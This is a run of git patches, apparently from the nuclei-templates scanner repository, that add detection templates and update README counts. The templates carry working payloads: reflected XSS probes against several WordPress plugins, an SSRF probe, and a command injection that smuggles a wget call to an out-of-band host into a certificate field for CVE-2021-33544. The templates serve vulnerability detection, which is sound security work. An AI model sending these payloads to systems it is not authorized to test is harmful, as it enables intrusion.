-5,7 +5,7 @@ info: author: gy741 severity: info reference: https://research.nccgroup.com/2021/07/06/technical-advisory-arbitrary-file-read-in-dell-wyse-management-suite-cve-2021-21586-cve-2021-21587/ - tags: panel + tags: panel,dell requests: - method: GET From 20252ef622aa8a54892135ce92e1f737ad4e8130 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 10:35:41 +0000 Subject: [PATCH 0503/4083] Auto Update README [Tue Jul 13 10:35:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ffe90b8c48..9532b7e68d 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 397 | vulnerabilities | 225 | exposed-panels | 195 | +| cves | 397 | vulnerabilities | 225 | exposed-panels | 196 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1497 files**. +**127 directories, 1498 files**. From 020b7974e048797843c05cc1b3ad06c7550ca56e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 16:20:01 +0530 Subject: [PATCH 0504/4083] minor update --- ...DVR-Java-Deserialization => qvisdvr-java-deserialization.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename iot/{QVISDVR-Java-Deserialization => qvisdvr-java-deserialization.yaml} (100%) diff --git a/iot/QVISDVR-Java-Deserialization b/iot/qvisdvr-java-deserialization.yaml similarity index 100% rename from iot/QVISDVR-Java-Deserialization rename to iot/qvisdvr-java-deserialization.yaml From bb53177a748de247c3067c1896e2a03f1d82de66 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 13 Jul 2021 16:26:33 +0530 Subject: [PATCH 0505/4083] Update CVE-2021-33544.yaml --- cves/2021/CVE-2021-33544.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index f14bda44c2..9422e50040 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -20,7 +20,6 @@ requests: Cache-Control: max-age=0 Connection: keep-alive - matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From 43d46441642602031b6d1805e7ae2e55ef359bc9 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 13 Jul 2021 16:29:55 +0530 Subject: [PATCH 0506/4083] Update CVE-2021-33544.yaml --- cves/2021/CVE-2021-33544.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 9422e50040..c89877d50d 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -14,9 +14,8 @@ requests: - | GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.277 Whale/2.9.118.38 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - ding: gzip, deflate + Accept-Encoding: gzip, deflate Cache-Control: max-age=0 Connection: keep-alive From 29b5812079ed9cb4c1350b355995ac3bf7aea1a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 11:01:06 +0000 Subject: [PATCH 0507/4083] Auto Update README [Tue Jul 13 11:01:06 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9532b7e68d..d46636c64e 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 397 | vulnerabilities | 225 | exposed-panels | 196 | +| cves | 398 | vulnerabilities | 225 | exposed-panels | 196 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1498 files**. +**127 directories, 1499 files**. From 3944d3d8a2867bf6a1ecf806134b8f1efc2fe283 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 11:13:23 +0000 Subject: [PATCH 0508/4083] Auto Update README [Tue Jul 13 11:13:23 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d46636c64e..7713ffbfc0 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 398 | vulnerabilities | 225 | exposed-panels | 196 | +| cves | 399 | vulnerabilities | 225 | exposed-panels | 196 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1499 files**. +**127 directories, 1500 files**. From c751aca0598bbc685c820eeb9501fd3c4b13eba6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 18:15:43 +0700 Subject: [PATCH 0509/4083] Create wp-flagem-xss.yaml --- vulnerabilities/wordpress/wp-flagem-xss.yaml | 29 ++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-flagem-xss.yaml diff --git a/vulnerabilities/wordpress/wp-flagem-xss.yaml b/vulnerabilities/wordpress/wp-flagem-xss.yaml new file mode 100644 index 0000000000..bcd78b1677 --- /dev/null +++ b/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -0,0 +1,29 @@ +id: wp-flagem-xss + +info: + name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/38674 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From c84918ab90a652a6085ba8a91c60270c77ae7b44 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 11:15:54 +0000 Subject: [PATCH 0510/4083] Auto Update README [Tue Jul 13 11:15:54 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7713ffbfc0..4c0f48849c 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 399 | vulnerabilities | 225 | exposed-panels | 196 | +| cves | 400 | vulnerabilities | 225 | exposed-panels | 196 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1500 files**. +**127 directories, 1501 files**. From 62cb5ce2bcdb0ec8501829e04cf327f8e88d3d45 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 18:17:14 +0700 Subject: [PATCH 0511/4083] Create wp-nextgen-xss.yaml --- vulnerabilities/wordpress/wp-nextgen-xss.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-nextgen-xss.yaml diff --git a/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/vulnerabilities/wordpress/wp-nextgen-xss.yaml new file mode 100644 index 0000000000..30f3806e85 --- /dev/null +++ b/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -0,0 +1,29 @@ +id: wp-nextgen-xss + +info: + name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/57200/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6b8a398a76dd977fedab8a3e7d28c36648a8e2ec Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 18:20:25 +0700 Subject: [PATCH 0512/4083] Create wp-slideshow-xss.yaml --- vulnerabilities/wp-slideshow-xss.yaml | 29 +++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wp-slideshow-xss.yaml diff --git a/vulnerabilities/wp-slideshow-xss.yaml b/vulnerabilities/wp-slideshow-xss.yaml new file mode 100644 index 0000000000..33cc69fc7a --- /dev/null +++ b/vulnerabilities/wp-slideshow-xss.yaml @@ -0,0 +1,29 @@ +id: wp-slideshow-xss + +info: + name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/37948 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 69dd5ae8a089561c4fd35a450d89bbddf44a26bb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 18:24:23 +0700 Subject: [PATCH 0513/4083] Adding some path --- vulnerabilities/wp-slideshow-xss.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/vulnerabilities/wp-slideshow-xss.yaml b/vulnerabilities/wp-slideshow-xss.yaml index 33cc69fc7a..41649c222c 100644 --- a/vulnerabilities/wp-slideshow-xss.yaml +++ b/vulnerabilities/wp-slideshow-xss.yaml @@ -11,6 +11,9 @@ requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' matchers-condition: and matchers: From 9aeac41fbca463e3b3565a3e349c7e75ad6dff99 Mon Sep 17 00:00:00 2001 From: Suman Kar Date: Tue, 13 Jul 2021 18:42:05 +0530 Subject: [PATCH 0514/4083] Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF --- cves/2021/cve-2021-24472.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2021/cve-2021-24472.yaml diff --git a/cves/2021/cve-2021-24472.yaml b/cves/2021/cve-2021-24472.yaml new file mode 100644 index 0000000000..bfa23ec0a5 --- /dev/null +++ b/cves/2021/cve-2021-24472.yaml @@ -0,0 +1,26 @@ +id: cve-2021-24472 + +info: + author: Suman_Kar + name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF + description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. + severity: high + tags: cve,wordpress,lfi,ssrf + +requests: + - raw: + - | + GET /?qtproxycall=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/README.md HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + + matchers-condition: and + matchers: + - type: word + words: + - 'Nuclei Templates' + - type: status + status: + - 200 \ No newline at end of file From f29b55b6cc5eeb0460deeedf3af0e47b46734615 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 20:45:32 +0700 Subject: [PATCH 0515/4083] Create CVE-2013-4117.yaml --- cves/2013/CVE-2013-4117.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2013/CVE-2013-4117.yaml diff --git a/cves/2013/CVE-2013-4117.yaml b/cves/2013/CVE-2013-4117.yaml new file mode 100644 index 0000000000..f539f2ed7b --- /dev/null +++ b/cves/2013/CVE-2013-4117.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-4117 + +info: + name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 0871ccb042f8fd58ff3641d8b7320900e276cd16 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 20:48:19 +0700 Subject: [PATCH 0516/4083] Create CVE-2013-4625.yaml --- cves/2013/CVE-2013-4625.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2013/CVE-2013-4625.yaml diff --git a/cves/2013/CVE-2013-4625.yaml b/cves/2013/CVE-2013-4625.yaml new file mode 100644 index 0000000000..e4336bb47d --- /dev/null +++ b/cves/2013/CVE-2013-4625.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-4625 + +info: + name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6d6b30e9cf449f9e9223c6070913be465e4a69aa Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 19:20:10 +0530 Subject: [PATCH 0517/4083] matcher update --- cves/2021/cve-2021-24472.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2021/cve-2021-24472.yaml b/cves/2021/cve-2021-24472.yaml index bfa23ec0a5..1bf56f6b1c 100644 --- a/cves/2021/cve-2021-24472.yaml +++ b/cves/2021/cve-2021-24472.yaml @@ -1,16 +1,16 @@ -id: cve-2021-24472 +id: CVE-2021-24472 info: author: Suman_Kar name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. severity: high - tags: cve,wordpress,lfi,ssrf + tags: cve,cve2021,wordpress,lfi,ssrf,oob requests: - raw: - | - GET /?qtproxycall=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/README.md HTTP/1.1 + GET /?qtproxycall=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 @@ -19,8 +19,10 @@ requests: matchers-condition: and matchers: - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - 'Nuclei Templates' + - "http" + - type: status status: - 200 \ No newline at end of file From b4e21feadd754b1db6338854258b43ddc1ab1258 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 13 Jul 2021 19:21:21 +0530 Subject: [PATCH 0518/4083] Rename cve-2021-24472.yaml to CVE-2021-24472.yaml --- cves/2021/{cve-2021-24472.yaml => CVE-2021-24472.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename cves/2021/{cve-2021-24472.yaml => CVE-2021-24472.yaml} (98%) diff --git a/cves/2021/cve-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml similarity index 98% rename from cves/2021/cve-2021-24472.yaml rename to cves/2021/CVE-2021-24472.yaml index 1bf56f6b1c..70924479aa 100644 --- a/cves/2021/cve-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -25,4 +25,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From b6ec1c2abb67372564348362e84e24ae43d1ba25 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 19:22:59 +0530 Subject: [PATCH 0519/4083] Added reference --- cves/2021/CVE-2021-24472.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml index 70924479aa..0b37b8ef3d 100644 --- a/cves/2021/CVE-2021-24472.yaml +++ b/cves/2021/CVE-2021-24472.yaml @@ -5,6 +5,7 @@ info: name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website. severity: high + reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a tags: cve,cve2021,wordpress,lfi,ssrf,oob requests: From b283f65482be2390d4d504afb5e2431b6c1cd110 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 13 Jul 2021 19:24:13 +0530 Subject: [PATCH 0520/4083] Create exposed-prometheus-log.yaml --- exposures/logs/exposed-prometheus-log.yaml | 24 ++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/logs/exposed-prometheus-log.yaml diff --git a/exposures/logs/exposed-prometheus-log.yaml b/exposures/logs/exposed-prometheus-log.yaml new file mode 100644 index 0000000000..0307c1728f --- /dev/null +++ b/exposures/logs/exposed-prometheus-log.yaml @@ -0,0 +1,24 @@ +id: exposed-prometheus-log + +info: + name: Exposed Prometheus + author: dhiyaneshDK + severity: low + tags: exposure,prometheus + +requests: + - method: GET + path: + - "{{BaseURL}}/prometheus" + + matchers-condition: and + matchers: + - type: word + words: + - 'gateway_request_total' + - 'logback_events_total' + condition: or + + - type: status + status: + - 200 From 7c4ad9c7734201f109a5f3b57bc792d723a00263 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 13:54:13 +0000 Subject: [PATCH 0521/4083] Auto Update README [Tue Jul 13 13:54:13 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 4c0f48849c..7342f06eaf 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 400 | vulnerabilities | 225 | exposed-panels | 196 | +| cves | 401 | vulnerabilities | 225 | exposed-panels | 196 | | takeovers | 70 | exposures | 113 | technologies | 117 | | misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1501 files**. +**127 directories, 1502 files**. From 120d2d7544c9b1572600421fa200eff092c9f380 Mon Sep 17 00:00:00 2001 From: RT <35173068+rtcms@users.noreply.github.com> Date: Tue, 13 Jul 2021 19:27:02 +0530 Subject: [PATCH 0522/4083] Change the severity to info This attack isn't possible Ref - https://github.com/EdOverflow/can-i-take-over-xyz/issues/206#issuecomment-869354802 --- takeovers/medium-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/medium-takeover.yaml b/takeovers/medium-takeover.yaml index 2a10ff62c3..4303e7125a 100644 --- a/takeovers/medium-takeover.yaml +++ b/takeovers/medium-takeover.yaml @@ -3,7 +3,7 @@ id: medium-takeover info: name: Medium Takeover Detection author: rtcms - severity: high + severity: info tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/206 @@ -17,4 +17,4 @@ requests: words: - Oops! We couldn’t find that page - Sorry about that - condition: and \ No newline at end of file + condition: and From 6dd92167eb696b10d938edc54ea673bc979a2cb2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 13 Jul 2021 19:35:58 +0530 Subject: [PATCH 0523/4083] minor updates --- exposures/logs/exposed-prometheus-log.yaml | 2 +- misconfiguration/unauthenticated-alert-manager.yaml | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/exposures/logs/exposed-prometheus-log.yaml b/exposures/logs/exposed-prometheus-log.yaml index 0307c1728f..a32fa72a2e 100644 --- a/exposures/logs/exposed-prometheus-log.yaml +++ b/exposures/logs/exposed-prometheus-log.yaml @@ -4,7 +4,7 @@ info: name: Exposed Prometheus author: dhiyaneshDK severity: low - tags: exposure,prometheus + tags: exposure,prometheus,logs requests: - method: GET diff --git a/misconfiguration/unauthenticated-alert-manager.yaml b/misconfiguration/unauthenticated-alert-manager.yaml index 514f6f13a4..f4b978d825 100644 --- a/misconfiguration/unauthenticated-alert-manager.yaml +++ b/misconfiguration/unauthenticated-alert-manager.yaml @@ -17,7 +17,6 @@ requests: - type: word words: - 'Alertmanager' - condition: or - type: status status: From af6d515c1f78f20da7ceceb7c7e90de1ed245874 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 13 Jul 2021 14:07:26 +0000 Subject: [PATCH 0524/4083] Auto Update README [Tue Jul 13 14:07:26 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 7342f06eaf..794c825152 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 401 | vulnerabilities | 225 | exposed-panels | 196 | -| takeovers | 70 | exposures | 113 | technologies | 117 | -| misconfiguration | 76 | workflows | 33 | miscellaneous | 27 | +| takeovers | 70 | exposures | 114 | technologies | 117 | +| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**127 directories, 1502 files**. +**127 directories, 1504 files**. From 4946a5d8a7aae66fa7eded86464c9d10bb221190 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 23:42:57 +0700 Subject: [PATCH 0525/4083] Create CVE-2011-4624.yaml --- cves/2011/CVE-2011-4624.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2011/CVE-2011-4624.yaml diff --git a/cves/2011/CVE-2011-4624.yaml b/cves/2011/CVE-2011-4624.yaml new file mode 100644 index 0000000000..5b4a43a3fc --- /dev/null +++ b/cves/2011/CVE-2011-4624.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-4624 + +info: + name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From a165adadae81bf11177398f8255ee266e515733d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 23:44:37 +0700 Subject: [PATCH 0526/4083] Create CVE-2011-4926.yaml --- cves/2011/CVE-2011-4926.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2011/CVE-2011-4926.yaml diff --git a/cves/2011/CVE-2011-4926.yaml b/cves/2011/CVE-2011-4926.yaml new file mode 100644 index 0000000000..465eeaba59 --- /dev/null +++ b/cves/2011/CVE-2011-4926.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-4926 + +info: + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 7b1fb46547a09bf268955fb65759a4ffbf1e09c4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:03:30 +0700 Subject: [PATCH 0527/4083] Create CVE-2011-4618.yaml --- cves/2011/CVE-2011-4618.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2011/CVE-2011-4618.yaml diff --git a/cves/2011/CVE-2011-4618.yaml b/cves/2011/CVE-2011-4618.yaml new file mode 100644 index 0000000000..a6ee265f87 --- /dev/null +++ b/cves/2011/CVE-2011-4618.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-4618 + +info: + name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 206ed76058c5e09075ae5ad6a3ae7c5f78126437 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:05:34 +0700 Subject: [PATCH 0528/4083] Create CVE-2011-5107.yaml --- cves/2011/CVE-2011-5107.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2011/CVE-2011-5107.yaml diff --git a/cves/2011/CVE-2011-5107.yaml b/cves/2011/CVE-2011-5107.yaml new file mode 100644 index 0000000000..dd4bb57d56 --- /dev/null +++ b/cves/2011/CVE-2011-5107.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5107 + +info: + name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: 